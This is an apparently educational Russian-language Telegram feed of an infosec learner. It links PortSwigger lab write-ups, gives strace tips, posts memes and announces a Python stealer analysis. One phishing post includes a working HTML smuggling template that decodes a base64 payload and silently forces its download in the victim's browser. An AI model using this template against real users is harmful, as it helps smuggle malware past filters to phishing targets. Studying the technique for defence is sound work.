Coffee cube
@coffee_cube
294 subscribers
121 photos
17 videos
24 files
84 links
Этот канал посвещен моему пути в сфере Информационной безопасности.

Выкладываю статьи по моим исследованиям, райтапы на лабораторные работы и забавные истории. Присоединяйтесь^3

По всем вопросам можете писать мне в ЛС: @ju57_4_cu63
Download Telegram
About
Blog
Apps
Platform
Join
Coffee cube
294 subscribers
Coffee cube
Coffee cube pinned «Всем привет^3 С момента создания блога я долго думал, о чём же писать. Первой мыслью было описание пути достижения поставленных мною целей, но не всегда очевидно, что из этого интересно, а что — нет. И спустя почти полгода я определился, поэтому предлагаю…»
Coffee cube
User_ID_controlled_by_request_parameter_with_password_disclosure.pdf
305.1 KB
Привет^3

Продолжаю выкладывать серию райтапов по Port Swigger Academy. Подошли к середине задач из подборки по уявимостям серверной части. Path traversal и Access control уже пройдены. Следующими будут разборы задач на Authentication.

#web #writeup@coffee_cube
🔥5🎉4🤔2👨‍💻1
307 viewsedited  
Coffee cube
Username enumeration via different responses.pdf
277.9 KB
Привет^3

Новый разбор задачи из Port Swigger Academy. В ней можно поработать с инструментом ffuf для подбора логинов пользователей.

#web #writeup@coffee_cube
🔥3👨‍💻31
321 viewsedited  
Coffee cube
Привет^3

Вы тоже ломали WiFi с помощью питона на продленке в школе?

#memes@coffee_cube
41👨‍💻1
313 viewsedited  
Coffee cube
2FA simple bypass.pdf
159.2 KB
Привет^3

Новый день - новый разбор лаб от Port Swigger Academy.

#web #writeup@coffee_cube
5👨‍💻21
308 viewsedited  
Coffee cube
Basic SSRF against the local server.pdf
146 KB
Привет^3

Сегодня будет разбор простой лабы с уязвимостью SSRF от Port Swigger Academy. Для ее решения удобно использовать инстремент Burp Suite. Он пригодится для решения дальнейших лаб.

#web #writeup@coffee_cube
👨‍💻31🔥1
287 viewsedited  
Coffee cube
Basic SSRF against another back-end system.pdf
134.7 KB
Привет^3

Сегодня будет разбор более сложная версия лабы с SSRF. Для ее решения пригодится Burp Suite. Следующие разборы будут об уязвимостях, которые возникают при загрузке файлов)

#web #writeup@coffee_cube
🔥4👨‍💻21
274 viewsedited  
Coffee cube
Привет^3

Решил постепенно рассказывать о утилитах и инструментах, которые использую в работе. Одна из таких утилит - strace. Она используется для отслеживания системных вызовов, которые использует исполняемый файл. Это информация помогает писать поведенческией правила для малварей, а так же просто при динамическом анализе. Далее приведен список флагов, которые чаще всего пригождаются мне в работе.

Полезные флаги

- -p - присоединиться к работающему процессу;
- -e - указать список отслеживаемых вызовов;


strace -e trace=network,read,write /path/to/app args


- -f - следование fork() ;
- -P - собирать системные вызовы связанные с конкретным файлом или дирикторией;


strace -P /etc/passwd cat /etc/passwd


#tool@coffee_cube
🔥3👨‍💻31
296 viewsedited  
Coffee cube
cat.jpg
48.9 KB
Remote code execution via web shell upload.pdf
119.3 KB
Привет^3

Сегодня будет разбор лабы с уязвимостью при загрузке изображения. Так совпало, что у моей прекрасной кошки сегодня ДР) Поэтому в качестве бонуса приложу фотку, которую я использовал в некоторых лабах Port Swigger )

#web #writeup@coffee_cube
8🔥4🎉3👨‍💻1
267 viewsedited  
Coffee cube
Web shell upload via Content-Type restriction bypass.pdf
242.9 KB
Привет^3

Вторая лаба на тему тестирования загрузки файлов от Port Swigger Academy. Далее пойду разборы лаб на темы инъекций.

Как раз для этой лабы я начал применять изображение котейки из прошлого поста:3

#web #writeup
@coffee_cube
👍2👨‍💻1
256 viewsedited  
Coffee cube
И такое бывает...^3

#memes@coffee_cube
🤣10🔥1🐳1👾1
233 views
Coffee cube
Media is too big
VIEW IN TELEGRAM
Привет^3

Сегодня я расскажу о другой части моей работы - Phishing.

Фишинг - это отправка мошеннических электронных писем с целью повлиять на жертву или заставить ее предоставить информацию , открытый файл или перейти по ссылкам.

Одной из актуальных техник является HTML Smuggling. Используя HTML5 и JavaScript можно доставить вредоносный файл на хост внутри HTML файла. В нем может содержаться большой бинарный объект JavaScript Blobs.

Blob

Неизменяемый объект, который представляет собой необработанные данные.


var myBlob = new Blob([myData], {type: 'octet/stream'});


Это создает Blob типа MIME octet/stream и заполняет данные, содержащиеся в myData.

Затем создается URL адрес из объекта Blob:


var myUrl = window.URL.createObjectURL(blob);
myAnchror.href = myUrl;


Далее, можно имитировать щелчок на якорном объекте с помощью метода HTMLElement.click():


myAnchor.click()


Пример

В данном примере содержимое файла будет закодировано в base64. В других постах приведу другие примеры для данной техники:3


<html>
    <head>
        <title>HTML smuggling demo</title>
    </head>
    <body>
     <script>
     function base64ToArrayBuffer(base64) {
        var binary_string = window.atob(base64);
        var len = binary_string.length;
        var bytes = new Uint8Array( len );
        for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
        return bytes.buffer;
       }

       var file = <!--payload in base64-->
       var data = base64ToArrayBuffer(file);
       var blob = new Blob([data], {type: 'octet/stream'});
       var fileName = 'payload.txt';

       if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
       else {
         var a = document.createElement('a');
         document.body.appendChild(a);
         a.style = 'display: none';
         var url = window.URL.createObjectURL(blob);
         a.href = url;
         a.download = fileName;
         a.click();
         window.URL.revokeObjectURL(url);
       }
     </script>
    </body>
</html>


#phishing@coffee_cube
👨‍💻21🔥1🤝1
286 viewsedited  
Coffee cube
Привет^3

Я считают, что отличный вариант названия тех, кто считает себе хакером, после скачивания Kali Linux. Звучит гордо - калисты...

#memes@coffee_cube
😁6🐳2😈1👨‍💻1💅1😎1
296 views
Coffee cube
OS command injection, simple case.pdf
256.4 KB
Привет^3

Первая из лаб на тему инъекция из поборки от Port Swigger Academy. Достаточно простая для понимания. Далее пойдут SQL инъекции.

#web #writeup
@coffee_cube
🔥21👨‍💻1
277 views
Coffee cube
This media is not supported in your browser
VIEW IN TELEGRAM
Привет^3

Так как сегодня первая лаба на SQL инъекцию, то я не смог не добавить мем.

А сам разбор в комментах)
https://t.iss.one/coffee_cube/53?comment=90

#web #writeup
@coffee_cube
👍4😁42🔥1👨‍💻1
372 viewsedited  
Coffee cube
Привет^3

У меня +1 в коллекцию малвараписчиков на Python)

#memes
@coffee_cube
😁6💅4👨‍💻31🗿1
327 views
Coffee cube
SQL injection vulnerability allowing login bypass.pdf
125.8 KB
Привет^3

Сегодня выкладывают последнюю райтап на лабу из подборки Server-side vulnerabilities. На днях соберу ссылки на все райтыпы в один список. А в понедельник будет разбор одного малваря на питоне.

#web #writeup
@coffee_cube
11🔥1👨‍💻1
343 views
Coffee cube
Разбор малваря RedTiger Ste4ler.pdf
262.8 KB
Привет^3

Какое-то время назад ко мне в руки попал стиллер, написанный на Python. Я решил его разобрать. К сожалению не успел посмотреть две функции, которые связаны с Discord. Этим я займусь чуть позже. Потенциально получится найти Discord-канал, на который эти данные сливаются, а также поковырять сайт, где эту тулу продают.

#rev #malware
@coffee_cube
🔥6👨‍💻3👍21🦄1
345 viewsedited  
Coffee cube
Exploiting path mapping for web cache deception.pdf
416.2 KB
Привет^3

Данная лаба показывает возможность кэшировать динмаческую страницу, для получения доступа к данным другого пользователя.

Напишите в комментариях: выкладывать разбора лаб на разные темы или последовательно на одну?

#web #writeup
@coffee_cube
🔥31👨‍💻1
313 views